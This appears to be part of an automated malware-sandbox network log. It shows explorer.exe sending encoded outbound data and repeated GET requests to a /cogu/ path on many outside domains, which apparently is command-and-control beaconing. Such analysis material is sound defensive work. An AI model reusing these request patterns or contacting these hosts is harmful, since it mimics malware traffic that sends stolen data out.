Oct 13, 2021 15:53:41.847326994 CEST	8735	OUT	Data Raw: 6a 44 63 30 48 53 75 4b 67 31 31 28 72 39 7a 34 68 6e 59 34 41 6f 43 6a 73 62 72 39 36 30 54 66 65 4c 78 61 62 44 61 42 48 6a 4e 4c 6d 58 4b 7e 6a 70 67 65 58 43 4c 47 73 31 77 79 70 79 68 42 31 58 35 53 63 77 47 6e 2d 73 6b 65 69 70 71 39 42 39 Data Ascii: jDc0HSuKg11(r9z4hnY4AoCjsbr960TfeLxabDaBHjNLmXK~jpgeXCLGs1wypyhB1X5ScwGn-skeipq9B9QwmTPyODRP-gCZCI7HgXBNRHF(QlWV9ZwbjC_gXGHqc5us0la~Z1mI61bv63fEbCQKS5Q2AGDZpyaMEyeImZOPxol~puwPU3PFQ~iAoQQu8TBFDxRs2ukkJayWP75gHRYcuZu93RSN2YNtP9cPJ(c4KHmWrUgFzDB
Oct 13, 2021 15:53:41.847445011 CEST	8737	OUT	Data Raw: 51 77 71 7a 41 4b 61 70 71 36 36 52 5a 75 32 6a 30 32 38 65 57 70 6f 47 47 65 35 4e 4e 46 69 4f 72 76 33 69 59 34 36 68 6b 4a 6f 71 65 76 73 4a 76 79 63 43 7a 6b 32 4b 6e 73 35 33 6b 42 63 6c 59 44 54 53 39 6f 52 58 30 68 48 4e 34 72 37 78 38 42 Data Ascii: QwqzAKapq66RZu2j028eWpoGGe5NNFiOrv3iY46hkJoqevsJvycCzk2Kns53kBclYDTS9oRX0hHN4r7x8BAotEgQbkBCvw755wCprYP~ZQNv20kdRs1y4eBVmkutkxHAfrfuf7neQltAU(kyKRxFbSdxOwsMqI42GsxNAn3YXthouqks6kFcJl8O6r_3139GLo0IZFihMp9VhAiDkh8k4MGh7ExRzoAqQwt50TGG3HhirfAjT25
Oct 13, 2021 15:53:41.847696066 CEST	8761	OUT	Data Raw: 58 36 56 31 52 58 6c 74 65 4e 50 78 68 48 2d 61 37 64 39 43 6a 54 78 31 67 52 58 54 71 30 33 56 48 50 6f 39 39 53 79 55 4c 79 57 6a 30 75 47 49 4c 49 46 77 5f 74 35 62 6c 4d 6c 30 66 6c 43 4c 44 55 74 39 4b 72 45 36 7a 38 43 52 54 4c 55 35 6b 4f Data Ascii: X6V1RXlteNPxhH-a7d9CjTx1gRXTq03VHPo99SyULyWj0uGILIFw_t5blMl0flCLDUt9KrE6z8CRTLU5kOucqcLRSNr3-C3X5uz8kcio0wv4urdUbeibI8xIJR-TxnOPH(no42aTxLrfMB-xMaQXK7zMszCXAGjlDvReoYgVBXD6TdZGOoq09xWP2MGb8KFrnNEpGBUiVN9GmyJ8OTGXEhAcox6bZIiO_KeSHRH9YBOAiW4NYqR
Oct 13, 2021 15:53:41.847834110 CEST	8770	OUT	Data Raw: 42 51 7a 57 66 55 77 41 34 76 65 52 74 37 76 7a 4e 56 6a 64 37 54 4e 44 66 77 68 4b 32 6b 76 50 67 62 4d 76 70 44 66 61 69 58 37 34 78 46 69 4f 33 58 49 37 57 6e 66 34 6c 57 52 74 6d 4b 55 6d 4c 28 47 70 45 38 49 76 37 76 50 41 47 35 4c 62 79 68 Data Ascii: BQzWfUwA4veRt7vzNVjd7TNDfwhK2kvPgbMvpDfaiX74xFiO3XI7Wnf4lWRtmKUmL(GpE8Iv7vPAG5LbyhuO4j8ZP62Tl9Hl9GvYXn-lEeCdxMa64eG00qZd1sPZ06Ib6GttR1RpjibzMguRccUHoBVTgcbTXHVysVcwajzTvZYgYJpu0MoPWzsGknpwinjBYekxhr4zOgUeZXwmka6oVEVw5wgT-PBNZQb5dgYWDrlQHkvJQaL
Oct 13, 2021 15:53:41.848062038 CEST	8780	OUT	Data Raw: 42 65 42 58 66 5a 77 56 66 55 36 48 34 68 37 55 75 6a 69 62 4d 78 4d 47 39 4d 4f 49 69 79 57 35 61 63 69 68 52 49 64 4e 34 4c 58 73 76 58 76 68 50 6b 66 44 45 4d 45 64 44 4c 5a 6d 42 47 48 50 2d 28 43 72 53 72 5f 48 4d 6c 30 68 4c 6e 4b 36 33 47 Data Ascii: BeBXfZwVfU6H4h7UujibMxMG9MOIiyW5acihRIdN4LXsvXvhPkfDEMEdDLZmBGHP-(CrSr_HMl0hLnK63G69uhm~Z7IhVuJzTwgn8OgQXZivYEktT0pCvxeuhmXYnMgF17Ih5ndUBTpRsBQ5hVUbjtvpxJtC4aScQJK~9T7fXj9iGEe1-U2XpdvKSHs(8bcAgJzgAlB8MhGugHxFv3xjvHCbL1ZoQEfV4ZsbYBQhxY9PGrnMjlL
Oct 13, 2021 15:53:42.007919073 CEST	8785	OUT	Data Raw: 63 41 59 51 56 45 42 66 75 72 4a 44 33 67 6e 47 78 6e 38 39 30 51 48 41 79 62 44 50 50 77 43 47 35 78 46 33 78 4a 47 79 4e 50 43 47 6a 4c 6c 62 6f 74 51 78 5f 39 54 43 57 7e 36 79 35 78 5f 76 33 46 65 33 47 68 56 69 59 46 54 79 49 41 6b 39 5a 7e Data Ascii: cAYQVEBfurJD3gnGxn890QHAybDPPwCG5xF3xJGyNPCGjLlbotQx_9TCW~6y5x_v3Fe3GhViYFTyIAk9Z~oNju-rwYMc9GZfzU8YLOrZ9AnkUFtJGIQbGIndVow3xKnj0aJyVAPQOuRRGVJUlUpgLOUtI(QeXAH7m9dQVp1Ptv4qBuyiZUxbnSWt30JVUVu6i3yr7Mw1Zs053DBL2O5d07s2J3mfN4dclES(lFFnSQfhQt1e37A

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
62	192.168.11.20	49860	199.34.228.191	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:53:41.687304020 CEST	8727	OUT	GET /cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&EVpdF=D6AlWhC HTTP/1.1 Host: www.shopsharpgraphics.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:53:41.879709005 CEST	8781	IN	HTTP/1.1 302 Found Server: nginx Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, private Date: Wed, 13 Oct 2021 13:53:41 GMT Location: https://www.shopsharpgraphics.com/cogu Set-Cookie: publishedsite-xsrf=eyJpdiI6ImQ3MW11MWw1V0NaVjlMREZscnlPMnc9PSIsInZhbHVlIjoicnF4a0JRMjh2UTZVT0NXb0IxeTdXNE1VVVZVNk5VcjBkdHN3STZ5SkVhZnJOazBRdDZocHIwWktGSndBMFJ3WXl1bFlEWTRxcjVWN1dHZlVWYkhTY3M2ZGVmTmZFNUl2Y01jZXhTQ05vUXByejhOK3BNSHRsXC9qakRaTW96dDhDIiwibWFjIjoiN2I4ODFkNGFjMzYxMWU3MzI0NDMzYTU3YzMwNmM3M2JlYjRjOTZjMzFmMDcwYzY0MmUzMzAwMGQzNmViODc1MiJ9; expires=Wed, 27-Oct-2021 13:53:41 GMT; Max-Age=1209600; path=/ Set-Cookie: XSRF-TOKEN=eyJpdiI6ImJ1K0xrNDVSQTl2TTZvQjBVZTcwNXc9PSIsInZhbHVlIjoiS25QVWRGRXdcL0N4aGlnUEtJZ296ZXBUSjVmYnVRWVJYXC9IaGgzOURPRWxnbkZkM0dOZFRNblEyQ0dwWGtOWEhBWHdUXC9Rc2tFZXhCb2RyXC9ZWGFUNml4OUQ1TDAzakhMbTJVVU13NXBydEx0dGNKc3BZWEtIVGx3cjk1cGhkc0dYIiwibWFjIjoiYTg3Njk5MjUzYjA3NTIzMmM1NzNmNjRiZjk5MzViZTM1NWRkZTUyYTc5Y2FiMjUyODAyMDgwNTU0YmY3YjcyYSJ9; expires=Wed, 27-Oct-2021 13:53:41 GMT; Max-Age=1209600; path=/ Set-Cookie: PublishedSiteSession=eyJpdiI6IjVVK2lrWW9XYUdTUnU2dWpxRG5HNmc9PSIsInZhbHVlIjoiRHhRR0picmFrVlFIblFlMGQyYnNrVVdsMVwvbkdnVEY4dmFDN3VJQXp4eWUxRnArZFFzKzRBUlwvQU5IckVlMCtFOHEzVUJFT2ZnYmhHYjZEMHFmZXk4N1dMUWg1Q0JrZTRQNWRuUEJGWks3dGR Data Raw: Data Ascii:
Oct 13, 2021 15:53:41.879796982 CEST	8781	IN	Data Raw: 58 43 39 53 51 57 5a 4d 57 43 74 79 51 33 67 77 53 45 52 48 4e 31 70 6a 53 6a 45 69 4c 43 4a 74 59 57 4d 69 4f 69 49 78 5a 54 52 69 59 54 41 32 59 6a 49 31 5a 47 4a 68 5a 44 67 35 4d 47 4a 6b 4f 54 51 78 4e 7a 52 6b 5a 44 4d 32 5a 57 49 78 5a 44 Data Ascii: XC9SQWZMWCtyQ3gwSERHN1pjSjEiLCJtYWMiOiIxZTRiYTA2YjI1ZGJhZDg5MGJkOTQxNzRkZDM2ZWIxZDg2OTk4MGNjMzAxYWZkYWVhMzJiZDc2ZDEzZTFiYzk1In0%3D; expires=Wed, 27-Oct-2021 13:53:41 GMT; Max-Age=1209600; path=/; httponlyX-Host: blu38.sf2p.intern.weebly.net
Oct 13, 2021 15:53:41.879843950 CEST	8782	IN	Data Raw: 31 38 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d Data Ascii: 18e<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://www.shopsharpgraphics.com/cogu'" /> <title>Redirecting to https://www.shopsharpgraphics.com/cogu</title

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
63	192.168.11.20	49862	199.34.228.191	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:54:19.627223015 CEST	8947	OUT	GET /cogu/?E6=87aM8EhKbioxWIlC6s4JEYcLDNdjlliEZPCwIIW3J1beA80Hn/9mg1w4n0mGUY+KwtTo&JXeD0V=5jFpKDWXi HTTP/1.1 Host: www.shopsharpgraphics.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:54:19.820161104 CEST	8948	IN	HTTP/1.1 302 Found Server: nginx Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Cache-Control: no-cache, private Date: Wed, 13 Oct 2021 13:54:19 GMT Location: https://www.shopsharpgraphics.com/cogu Set-Cookie: publishedsite-xsrf=eyJpdiI6InBsR1o0R21QYUhzaGtmQ3hCYWFkcnc9PSIsInZhbHVlIjoiczZQRExSWk1iNmN0cHN2VGE0UXYra1wvNVRHcm5BaWVYSHpnTU1ud2dIUmVKMWNRMnJEZnFSODRUdmtkaXhVRWNTekxJNlZvUDBCSGRTbldSMm5YMSt3R1NPeGExRlRDRFJOVXFwZmRGalNxRFpXRGpSTGVhd1huQzFaZTJsWFFxIiwibWFjIjoiYjIwMjM0MWNhMGY4MWJmOGQ0ZGFiYmY1NWYwMTU1NzM5ZDhiMTA1NWQwYmZlYmU1NDg4ZWY2YjdiNjA5MjgwZSJ9; expires=Wed, 27-Oct-2021 13:54:19 GMT; Max-Age=1209600; path=/ Set-Cookie: XSRF-TOKEN=eyJpdiI6IkUySWhqWldOWGJSWGtCUE03OGgxXC9RPT0iLCJ2YWx1ZSI6IkxIWklTb3dTclRaaVlzckVBNWNXbUlHcDFsQzlSSXZDTjgzUEhGTGdUK2QwR2hKRm5JNkNIUHdXZ2FveWJcL2dZYVVxUkE5U0dGXC9rZlg5WWpSZnJtT3JSWW9pYkZWV3BWQWtTdkVmU3dGVVo2SWZUNmpOTU51alFvXC9Dd29ibmVzIiwibWFjIjoiNjU2N2EwZjA3YjBmYWQ2ZWY3MDgxY2YwZGQ0NGY3ZWM1ZTE1N2Y0NWZhZmE0NDI4NTVlZGNmYzU4ODFjOWQ3ZCJ9; expires=Wed, 27-Oct-2021 13:54:19 GMT; Max-Age=1209600; path=/ Set-Cookie: PublishedSiteSession=eyJpdiI6InU2eXMzdTg4eDNBTkJndGV1RWY5dHc9PSIsInZhbHVlIjoiaW1YOXc0aGprbUpBeWtcL3NhOWJDaFVzSklaZnNBUDB5YzNxYXMxQmRlVWhuZmlNQ25tXC92WEk0UUJSblFCOW03ajNDR21NY3F0RXByWWRUQUFyaFFXNzF0eldkV0ppaU5RblVcL2VxK040YnN Data Raw: Data Ascii:
Oct 13, 2021 15:54:19.820234060 CEST	8948	IN	Data Raw: 55 56 52 63 4c 32 52 63 4c 7a 6c 58 55 6c 5a 54 52 44 56 52 57 56 64 51 59 58 6c 78 57 69 49 73 49 6d 31 68 59 79 49 36 49 6d 59 33 4d 47 4a 6a 4e 54 67 35 59 54 67 30 4d 54 4a 68 5a 54 68 6c 59 57 59 32 59 57 59 31 4e 7a 49 77 4f 54 6b 32 59 7a Data Ascii: UVRcL2RcLzlXUlZTRDVRWVdQYXlxWiIsIm1hYyI6ImY3MGJjNTg5YTg0MTJhZThlYWY2YWY1NzIwOTk2YzkwZDRhYjNkOWM0NTUwNjY3OTUwZThiN2M4MDM5MTdjNTgifQ%3D%3D; expires=Wed, 27-Oct-2021 13:54:19 GMT; Max-Age=1209600; path=/; httponlyX-Host: grn58.sf2p.intern.weebl
Oct 13, 2021 15:54:19.820313931 CEST	8949	IN	Data Raw: 31 38 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d Data Ascii: 18e<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://www.shopsharpgraphics.com/cogu'" /> <title>Redirecting to https://www.shopsharpgraphics.com/cogu</title

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
64	192.168.11.20	49863	137.117.17.70	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:54:30.056495905 CEST	8950	OUT	GET /cogu/?E6=NFedTnOwyfQnQfz4Fa359HV39V5qjz9UUQouYpwkrhdO9l9uPa/7UwpxNrVjVYhaXz3f&JXeD0V=5jFpKDWXi HTTP/1.1 Host: www.uprisehealthmonitoring.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:54:30.226277113 CEST	8950	IN	HTTP/1.1 301 Moved Permanently Content-Type: text/html; charset=UTF-8 Location: https://www.uprisehealthmonitoring.com/cogu/?E6=NFedTnOwyfQnQfz4Fa359HV39V5qjz9UUQouYpwkrhdO9l9uPa/7UwpxNrVjVYhaXz3f&JXeD0V=5jFpKDWXi Date: Wed, 13 Oct 2021 13:54:29 GMT Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
65	192.168.11.20	49864	192.0.78.25	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:54:35.279756069 CEST	8951	OUT	GET /cogu/?E6=L5GjM02Qi9/3ctzLfpX21kbqInICP/PmVfQkFp534KYMBhdy6kz6hr7HyPkdH1b6OtPy&JXeD0V=5jFpKDWXi HTTP/1.1 Host: www.estudio-me.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:54:35.447942019 CEST	8952	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 13 Oct 2021 13:54:35 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.estudio-me.com/cogu/?E6=L5GjM02Qi9/3ctzLfpX21kbqInICP/PmVfQkFp534KYMBhdy6kz6hr7HyPkdH1b6OtPy&JXeD0V=5jFpKDWXi X-ac: 2.hhn _dca Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
66	192.168.11.20	49865	3.121.211.190	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:54:40.708901882 CEST	8953	OUT	GET /cogu/?E6=CWSu9rBRqjtTkxrJy4pABq4mxihAfalcaoFBMiLqB2EmPhnp5uCs+6CRD45lGLAfaluR&JXeD0V=5jFpKDWXi HTTP/1.1 Host: www.i8news-de.website Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:54:40.719755888 CEST	8953	IN	HTTP/1.1 404 Not Found Server: nginx/1.15.7 Date: Wed, 13 Oct 2021 13:54:40 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
67	192.168.11.20	49866	156.67.72.176	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:54:46.390230894 CEST	8954	OUT	GET /cogu/?E6=6yxwGmrm3Ap/M+4TPZhn44EC1HJh+94HIixwD1LsvJrE4PEEHQNTPR5lSm/JOI/dScyn&JXeD0V=5jFpKDWXi HTTP/1.1 Host: www.alexanderorlandis.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:54:46.536946058 CEST	8955	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 707 date: Wed, 13 Oct 2021 13:54:46 GMT server: LiteSpeed location: https://www.alexanderorlandis.com/cogu/?E6=6yxwGmrm3Ap/M+4TPZhn44EC1HJh+94HIixwD1LsvJrE4PEEHQNTPR5lSm/JOI/dScyn&JXeD0V=5jFpKDWXi content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
68	192.168.11.20	49867	198.54.117.210	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:54:51.707982063 CEST	8956	OUT	GET /cogu/?E6=XUO191KcVQfEEWsMJ9UBYnlCa/I+dhdLiWjITA58DRbwOP6fYUmdo8NYhzdUy3C+FUJf&EVpdF=D6AlWhC HTTP/1.1 Host: www.domainair.biz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
69	192.168.11.20	49868	204.141.43.204	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 13, 2021 15:54:57.027148962 CEST	8956	OUT	GET /cogu/?E6=NkcQ3oDOYkJGNuF95ZpkIKht5W0ulo+Ok2Me3lTyYaTuJ86BWuzspf8yVeXKwyiufl+B&EVpdF=D6AlWhC HTTP/1.1 Host: www.nazfoodstuff.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 13, 2021 15:54:57.196141958 CEST	8957	IN	HTTP/1.1 404 Server: ZGS Date: Wed, 13 Oct 2021 13:54:57 GMT Content-Type: text/html Content-Length: 4647 Connection: close Set-Cookie: 0cea9df7db=aa11b5b9d2a4fd36a1a24567047ff52b; Path=/ X-XSS-Protection: 1 Set-Cookie: csrfc=5836c7c0-8aca-4819-91e7-5017630108e8;path=/;priority=high Set-Cookie: _zcsr_tmp=5836c7c0-8aca-4819-91e7-5017630108e8;path=/;SameSite=Strict;priority=high Pragma: no-cache Cache-Control: private,no-cache,no-store,max-age=0,must-revalidate Expires: Thu, 01 Jan 1970 00:00:00 GMT vary: accept-encoding Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 2c 20 6e 6f 61 72 63 68 69 76 65 2c 20 6e 6f 73 6e 69 70 70 65 74 22 20 2f 3e 0a 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 5a 6f 68 6f 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 77 65 62 66 6f 6e 74 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 22 3e 0a 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 70 78 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 70 78 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 35 66 35 66 35 3b 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 74 6f 70 43 6f 6c 6f 72 73 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 2d 6d 6f 7a 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 6c 65 66 74 2c 20 23 66 30 34 37 33 64 20 30 25 2c 20 23 66 30 34 37 33 64 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 2d 77 65 62 6b 69 74 2d 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 6c 65 66 74 2c 20 23 66 30 34 37 33 64 20 30 25 2c 20 23 66 30 34 37 33 64 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 32 35 25 2c 20 23 30 34 39 37 33 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 35 30 25 2c 20 23 30 30 38 36 64 35 20 37 35 25 2c 20 23 66 64 63 30 30 30 20 37 35 25 2c 23 66 64 63 30 30 30 20 31 30 30 25 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 34 35 Data Ascii: <!DOCTYPE html><html> <head> <meta name="robots" content="noindex, nofollow, noarchive, nosnippet" /> <title>Zoho</title> <link type="text/css" rel="stylesheet" href="/webfonts?family=Open+Sans:400,600"> <style> body{ font-family:"Open Sans", sans-serif; font-size:11px; margin:0px; padding:0px; background-color:#f5f5f5; } .topColors{ background: -moz-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background: -webkit-linear-gradient(left, #f0473d 0%, #f0473d 25%, #049735 25%, #049735 50%, #0086d5 50%, #0086d5 75%, #fdc000 75%,#fdc000 100%); background-size:45
Oct 13, 2021 15:54:57.196249008 CEST	8959	IN	Data Raw: 32 70 78 20 61 75 74 6f 3b 68 65 69 67 68 74 3a 33 70 78 3b 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 6d 61 69 6e 43 6f 6e 74 61 69 6e 65 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 30 70 78 3b Data Ascii: 2px auto;height:3px; } .mainContainer{ width:1000px; margin:0px auto; } .logo{ margin-top:3px; padding:18px 0px; } .content{ back
Oct 13, 2021 15:54:57.196261883 CEST	8960	IN	Data Raw: 2d 77 65 69 67 68 74 3a 34 30 30 3b 20 0a 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 2e 64 6f 6d 61 69 6e 2d 63 6f 6c 6f 72 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 23 30 30 38 36 44 35 3b 20 0a 20 20 20 20 Data Ascii: -weight:400; } .domain-color{ color:#0086D5; } .main-info{ margin-top: 40px; } .main-info li { font-size: 16px; padding: 10px 0;
